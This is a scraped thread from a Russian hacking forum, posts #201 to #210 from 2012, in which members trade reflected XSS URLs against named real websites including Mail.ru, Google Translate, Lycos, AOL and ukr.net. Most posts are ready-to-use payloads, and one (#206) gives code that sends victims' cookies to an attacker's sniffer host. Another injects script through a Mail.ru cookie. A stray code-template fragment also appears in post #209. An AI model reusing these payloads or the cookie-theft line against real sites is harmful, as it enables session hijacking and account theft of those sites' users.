HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #201  
Старый 23.01.2012, 21:06
Unknown
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 49
По умолчанию

http://techguru.aol.com/?ncid=txtlnkusstor00000094">alert(String.fromCharCode(88,83,83,32,65,78,84,7 3,67,72,65,84))
 
Ответить с цитированием

  #202  
Старый 26.01.2012, 21:25
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

LiveInternet

Код:
Code:
http://www.liveinternet.ru/jsearch/?s=">alert('xss')
 
Ответить с цитированием

  #203  
Старый 30.01.2012, 16:19
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

тИЦ 100

PR 7


Код:
Code:
http://games.lycos.com/board-game/gacopyrze-vs_-wilkolkialert(document.cookie)/
 
Ответить с цитированием

  #204  
Старый 02.02.2012, 19:06
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

Mail.ru

Код:
Code:
http://apps.hi-tech.mail.ru/contest/add/?comment=&Domain=mail.ru&Login=&Password=&platform=">alert('xss')
 
Ответить с цитированием

  #205  
Старый 04.02.2012, 10:27
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

kravch_v, не надо юзать HTML, если XSS внутри JS-кода.

http://apps.hi-tech.mail.ru/contest/add/?platform='%3Balert('xss')%3Ba='
 
Ответить с цитированием

  #206  
Старый 04.02.2012, 19:44
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

M_script, спасибо!

Google XSS

Код:
Code:
http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://ссылка_на_уязвимый_код
Пример:

Код:
Code:
http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://exploit-db.ru/googlexss/
Для кражи кук используйте следующий код:

Код:
Code:
img = new Image(); img.src = "http://адрес_сниффера.gif?"+document.cookie;
// M_script, то сообщение кто-то удалил. Печеньки я каким-то образом крал. Пассивки на ютубе нету.
 
Ответить с цитированием

  #207  
Старый 04.02.2012, 20:12
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

kravch_v, ты в начале января уже выкладывал эту XSSку на гугле. Там выполнение JS-кода происходит не на google.ru(com), а на googleusercontent.com. Соответственно, куки будут с домена googleusercontent.com. Как их можно использовать на практике?

upd:

Цитата:
Сообщение от kravch_v  
kravch_v said:
Печеньки я каким-то образом крал
Куки на googleusercontent.com есть и украсть их можно, но в них не содержится сессии google.com
 
Ответить с цитированием

  #208  
Старый 05.02.2012, 01:22
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

Mail.Ru - Недостаточная фильтрация в cookie

Уязвимый код (cookie):

Код:
Code:
Mpop=test:test:test@test.ru">alert('xss');
Заходим на w2.dwar.mail.ru и код успешно выполняется.
 
Ответить с цитированием

  #209  
Старый 05.02.2012, 13:02
Unknown
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 6
По умолчанию

Почта Укр.нет

[HTML]
HTML:
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">+

[/QUOTE]
" if author else f"
Цитата:

По сути можно поставить onerror и onload, нужно только подумать как .
 
Ответить с цитированием

  #210  
Старый 05.02.2012, 13:56
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

[QUOTE="Unix@"]
Unix@ said:
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">++
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ